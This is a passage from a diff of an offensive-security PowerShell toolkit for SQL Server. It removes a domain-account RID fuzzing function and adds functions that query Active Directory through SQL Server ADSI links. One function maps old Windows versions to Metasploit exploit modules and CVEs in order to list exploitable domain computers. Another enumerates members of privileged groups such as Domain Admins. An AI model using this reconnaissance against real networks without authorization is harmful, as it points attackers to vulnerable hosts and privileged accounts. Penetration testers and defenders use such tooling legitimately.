resolved to: $PrincipalName ($PrincipalType)" - } - else - { - Write-Verbose -Message "$Instance : - Principal ID $_ resolved to: " - } - } + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - # Append results - #$TblFuzzedLogins = $TblFuzzedLogins + $TblResults - if($GetPrincipalType) - { - $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName, $PrincipalType) - } - else - { - $null = $TblFuzzedLogins.Rows.Add($ComputerName, $Instance, $PrincipalId, $PrincipalName) - } + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, + + [Parameter(Mandatory = $false, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME } } - End + Process { - # Return data - $TblFuzzedLogins | Where-Object -FilterScript { - $_.PrincipleName.length -ge 2 + # Call Get-SQLDomainObject + if($UseAdHoc){ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" -LdapFields 'name,dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' -UseAdHoc + }else{ + Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))" -LdapFields 'name,dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' } + } -} + End + { + } +} # ---------------------------------- -# Get-SQLFuzzDomainAccount +# Get-SQLDomainExploitableSystem # ---------------------------------- -# Author: Scott Sutherland -Function Get-SQLFuzzDomainAccount +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainExploitableSystem { <# .SYNOPSIS - Enumerates domain groups, computer accounts, and user accounts based on domain RID using SUSER_SNAME() and only the Public role. - Note: In a typical domain 10000 or more is recommended for the EndId. + Using the OLE DB ADSI provider, query Active Directory for a list of domain exploitable computers + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. - .PARAMETER StartId - RID to start fuzzing with. - .PARAMETER EndId - RID to stop fuzzing with. + .PARAMETER TargetDomain + Domain to query. .EXAMPLE - PS C:\> Get-SQLFuzzDomainAccount -Instance SQLServer1\STANDARDDEV2014 -Verbose -StartId 500 -EndId 1500 - - VERBOSE: SQLServer1\STANDARDDEV2014 : Connection Success. - VERBOSE: SQLServer1\STANDARDDEV2014 : Enumerating Domain accounts from the SQL Server's default domain... - VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f4010000 (500) Resolved to: Domain\Administrator - VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f5010000 (501) Resolved to: Domain\Guest - VERBOSE: SQLServer1\STANDARDDEV2014 : RID 0x010500000000000515000000A132413243431431326051C0f6010000 (502) Resolved to: Domain\krbtgt - [TRUNCATED] - - ComputerName Instance DomainAccount - ------------ -------- ------------- - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Administrator - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Guest - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\krbtgt - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Guests - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Computers - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Domain Controllers - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Cert Publishers - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Schema Admins - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Enterprise Admins - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Group Policy Creator Owners - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Read-only Domain Controllers - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Cloneable Domain Controllers - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Protected Users - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\RAS and IAS Servers - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Allowed RODC Password Replication Group - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\Denied RODC Password Replication Group - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\HelpServicesGroup - - [TRUNCATED] - - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyUser - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyDAUser - SQLServer1 SQLServer1\STANDARDDEV2014 Domain\MyEAUser + PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc + .EXAMPLE + PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose + .EXAMPLE + PS C:\> Get-SQLDomainExploitableSystem -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainExploitableSystem -Verbose #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account to authenticate with.')] + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] [string]$Username, [Parameter(Mandatory = $false, - ValueFromPipelineByPropertyName = $true, - HelpMessage = 'SQL Server or domain account password to authenticate with.')] + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] [string]$Password, + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, + + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, + [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] @@ -7812,12 +9070,13 @@ Function Get-SQLFuzzDomainAccount [string]$Instance, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to start fuzzing with.')] - [string]$StartId = 500, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, [Parameter(Mandatory = $false, - HelpMessage = 'Principal ID to stop fuzzing on.')] - [string]$EndId = 1000, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, [Parameter(Mandatory = $false, HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] @@ -7826,556 +9085,781 @@ Function Get-SQLFuzzDomainAccount Begin { - # Table for output - $TblFuzzedAccounts = New-Object -TypeName System.Data.DataTable - } - - Process - { - # Parse computer name from the instance - $ComputerName = Get-ComputerNameFromInstance -Instance $Instance - - # Default connection to local default instance + # set instance to local host by default if(-not $Instance) { $Instance = $env:COMPUTERNAME } + + # Create data table for list of patches levels with a MSF exploit + $TableExploits = New-Object System.Data.DataTable + $TableExploits.Columns.Add('OperatingSystem') | Out-Null + $TableExploits.Columns.Add('ServicePack') | Out-Null + $TableExploits.Columns.Add('MsfModule') | Out-Null + $TableExploits.Columns.Add('CVE') | Out-Null + + # Add exploits to data table + $TableExploits.Rows.Add("Windows 7","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 2","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 3","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","Service Pack 4","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/iis/ms03_007_ntdll_webdav","http://www.cvedetails.com/cve/2003-0109") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") | Out-Null + $TableExploits.Rows.Add("Windows Server 2000","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Server Pack 1","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/dcerpc/ms07_029_msdns_zonename","http://www.cvedetails.com/cve/2007-1748") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows Server 2003 R2","","exploit/windows/wins/ms04_045_wins","http://www.cvedetails.com/cve/2004-1080/") | Out-Null + $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null + $TableExploits.Rows.Add("Windows Server 2008","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null + $TableExploits.Rows.Add("Windows Server 2008","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Server 2008 R2","","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null + $TableExploits.Rows.Add("Windows Vista","Server Pack 1","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null + $TableExploits.Rows.Add("Windows Vista","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows Vista","","exploit/windows/smb/ms09_050_smb2_negotiate_func_index","http://www.cvedetails.com/cve/2009-3103") | Out-Null + $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms04_011_lsass","http://www.cvedetails.com/cve/2003-0533/") | Out-Null + $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms05_039_pnp","http://www.cvedetails.com/cve/2005-1983") | Out-Null + $TableExploits.Rows.Add("Windows XP","Server Pack 1","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_066_nwapi","http://www.cvedetails.com/cve/2006-4688") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms06_070_wkssvc","http://www.cvedetails.com/cve/2006-4691") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 2","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + $TableExploits.Rows.Add("Windows XP","Service Pack 3","exploit/windows/smb/ms10_061_spoolss","http://www.cvedetails.com/cve/2010-2729") | Out-Null + $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms03_026_dcom","http://www.cvedetails.com/cve/2003-0352/") | Out-Null + $TableExploits.Rows.Add("Windows XP","","exploit/windows/dcerpc/ms05_017_msmq","http://www.cvedetails.com/cve/2005-0059") | Out-Null + $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms06_040_netapi","http://www.cvedetails.com/cve/2006-3439") | Out-Null + $TableExploits.Rows.Add("Windows XP","","exploit/windows/smb/ms08_067_netapi","http://www.cvedetails.com/cve/2008-4250") | Out-Null + + # Create data table to house vulnerable server list + $TableVulnComputers = New-Object System.Data.DataTable + $TableVulnComputers.Columns.Add('ComputerName') | Out-Null + $TableVulnComputers.Columns.Add('OperatingSystem') | Out-Null + $TableVulnComputers.Columns.Add('ServicePack') | Out-Null + $TableVulnComputers.Columns.Add('LastLogon') | Out-Null + $TableVulnComputers.Columns.Add('MsfModule') | Out-Null + $TableVulnComputers.Columns.Add('CVE') | Out-Null + } + + Process + { + # Call Get-SQLDomainObject + if($UseAdHoc){ + $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' -UseAdHoc + }else{ + $Result = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(objectCategory=Computer)" -LdapFields 'dnshostname,operatingsystem,operatingsystemversion,operatingsystemservicepack,whenchanged,logoncount' + } + + # Iterate through each exploit + $TableExploits | ForEach-Object { + + $ExploitOS = $_.OperatingSystem + $ExploitSP = $_.ServicePack + $ExploitMsf = $_.MsfModule + $ExploitCve = $_.CVE + + # Iterate through each ADS computer + $Result | ForEach-Object { + + $AdsHostname = $_.DNSHostName + $AdsOS = $_.OperatingSystem + $AdsSP = $_.OperatingSystemServicePack + $AdsLast = $_.LastLogon + + # Add exploitable systems to vuln computers data table + if ($AdsOS -like "$ExploitOS*" -and $AdsSP -like "$ExploitSP" ){ + + # Add domain computer to data table + $TableVulnComputers.Rows.Add($AdsHostname,$AdsOS,$AdsSP,[dateTime]::FromFileTime($AdsLast),$ExploitMsf,$ExploitCve) | Out-Null + } - # Test connection to instance - $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { - $_.Status -eq 'Accessible' - } - if($TestConnection) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Success." - Write-Verbose -Message "$Instance : Enumerating Domain accounts from the SQL Server's default domain..." - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : Connection Failed." } - return + } - # Grab server information - $ServerInfo = Get-SQLServerInfo -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $ComputerName = $ServerInfo.ComputerName - $Instance = $ServerInfo.Instance - $Domain = $ServerInfo.DomainName - $DomainGroup = "$Domain\Domain Admins" - $DomainGroupSid = Get-SQLQuery -Instance $Instance -Query "select SUSER_SID('$DomainGroup') as DomainGroupSid" -Username $Username -Password $Password -Credential $Credential -SuppressVerbose - $DomainGroupSidBytes = $DomainGroupSid | Select-Object -Property domaingroupsid -ExpandProperty domaingroupsid - $DomainGroupSidString = [System.BitConverter]::ToString($DomainGroupSidBytes).Replace('-','').Substring(0,48) + $TableVulnComputers | Sort-Object { $_.lastlogon -as [datetime]} -Descending - # Fuzz from StartId to EndId - $StartId..$EndId | - ForEach-Object -Process { - # Convert to Principal ID to hex - $PrincipalIDHex = '{0:x}' -f $_ + } - # Get number of characters - $PrincipalIDHexPad1 = $PrincipalIDHex | Measure-Object -Character - $PrincipalIDHexPad2 = $PrincipalIDHexPad1.Characters + End + { + } +} - # Check if number is even and fix leading 0 if needed - If([bool]($PrincipalIDHexPad2%2)) - { - $PrincipalIDHexFix = "0$PrincipalIDHex" - } +# ---------------------------------- +# Get-SQLDomainGroupMember +# ---------------------------------- +# Author: Scott Sutherland, Thomas Elling +Function Get-SQLDomainGroupMember +{ + <# + .SYNOPSIS + Using the OLE DB ADSI provider, query Active Directory for a list of domain group members + via the domain logon server associated with the SQL Server. This can be + done using a SQL Server link (OpenQuery) or AdHoc query (OpenRowset). Use the -UseAdHoc + flag to switch between modes. + .PARAMETER Username + SQL Server or domain account to authenticate with. + .PARAMETER Password + SQL Server or domain account password to authenticate with. + .PARAMETER LinkUsername + Domain account used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER LinkPassword + Domain account password used to authenticate to LDAP through SQL Server ADSI link. + .PARAMETER UseAdHoc + Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet. + .PARAMETER Credential + SQL Server credential. + .PARAMETER Instance + SQL Server instance to connection to. + .PARAMETER TargetDomain + Domain to query. + .PARAMETER FilterGroup + Domain group to filter for. + .EXAMPLE + PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -FilterGroup 'Enterprise Admins' + .EXAMPLE + PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -UseAdHoc -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -FilterGroup 'Enterprise Admins' + .EXAMPLE + PS C:\> Get-SQLDomainGroupMember -Instance SQLServer1\STANDARDDEV2014 -Verbose -LinkUsername 'domain\user' -LinkPassword 'Password123!' + .EXAMPLE + PS C:\> Get-SQLInstanceLocal | Get-SQLDomainGroupMember -Verbose + #> + [CmdletBinding()] + Param( + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account to authenticate to SQL Server.')] + [string]$Username, - # Reverse the order of the hex - $GroupsOfTwo = $PrincipalIDHexFix -split '(..)' | Where-Object -FilterScript { - $_ - } - $GroupsOfTwoR = $GroupsOfTwo | Sort-Object -Descending - $PrincipalIDHexFix2 = $GroupsOfTwoR -join '' + [Parameter(Mandatory = $false, + HelpMessage = 'SQL Server or domain account password to authenticate to SQL Server.')] + [string]$Password, - # Pad to 8 bytes - $PrincipalIDPad = $PrincipalIDHexFix2.PadRight(8,'0') + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkUsername, - # Create users rid - $Rid = "0x$DomainGroupSidString$PrincipalIDPad" + [Parameter(Mandatory = $false, + HelpMessage = 'Domain account password used to authenticate to LDAP through SQL Server ADSI link.')] + [string]$LinkPassword, - # Define Query - $Query = "SELECT '$ComputerName' as [ComputerName], - '$Instance' as [Instance], - '$Rid' as [RID], - SUSER_SNAME($Rid) as [DomainAccount]" + [Parameter(Mandatory = $false, + HelpMessage = 'Windows credentials.')] + [System.Management.Automation.PSCredential] + [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, - # Execute Query - $TblResults = Get-SQLQuery -Instance $Instance -Query $Query -Username $Username -Password $Password -Credential $Credential -SuppressVerbose + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'SQL Server instance to connection to.')] + [string]$Instance, - $DomainAccount = $TblResults.DomainAccount - if($DomainAccount.length -ge 2) - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - RID $Rid ($_) resolved to: $DomainAccount" - } - } - else - { - if( -not $SuppressVerbose) - { - Write-Verbose -Message "$Instance : - RID $Rid ($_) resolved to: " - } - } + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain group to filter for.')] + [string]$FilterGroup, - # Append results - $TblFuzzedAccounts = $TblFuzzedAccounts + $TblResults + [Parameter(Mandatory = $false, + HelpMessage = 'Use adhoc connection for executing the query instead of a server link. The link option (default) will create an ADSI server link and use OpenQuery. The AdHoc option will enable adhoc queries, and use OpenRowSet.')] + [Switch]$UseAdHoc, + + [Parameter(Mandatory = $false, + ValueFromPipelineByPropertyName = $true, + HelpMessage = 'Domain to query.')] + [string]$TargetDomain, + + [Parameter(Mandatory = $false, + HelpMessage = 'Suppress verbose errors. Used when function is wrapped.')] + [switch]$SuppressVerbose + ) + + Begin + { + # set instance to local host by default + if(-not $Instance) + { + $Instance = $env:COMPUTERNAME + } + + # Setup group filter + if((-not $FilterGroup)){ + $FilterGroup = 'Domain Admins' } + + $TableMembers = New-Object System.Data.DataTable + $TableMembers.Columns.Add('Group') | Out-Null + $TableMembers.Columns.Add('sAMAccountName') | Out-Null + $TableMembers.Columns.Add('displayName') | Out-Null } - End + Process { - # Return data - $TblFuzzedAccounts | - Select-Object -Property ComputerName, Instance, DomainAccount -Unique | - Where-Object -FilterScript { - $_.DomainAccount -notlike '' + # Call Get-SQLDomainObject to get group DN + if($UseAdHoc){ + $FullDN = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=group)(samaccountname=$FilterGroup))" -LdapFields 'distinguishedname' -UseAdHoc -SuppressVerbose + }else{ + $FullDN = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=group)(samaccountname=$FilterGroup))" -LdapFields 'distinguishedname' -SuppressVerbose + } + + $DN = $FullDN.distinguishedname + + # Call Get-SQLDomainObject to get group membership + if($UseAdHoc){ + $Results = Get-SQLDomainObject -Verbose -Instance $Instance -Username $Username -Password $Password -LinkUsername $LinkUsername -LinkPassword $LinkPassword -LdapPath $TargetDomain -LdapFilter "(&(objectCategory=user)(memberOf=$DN))" -LdapFields 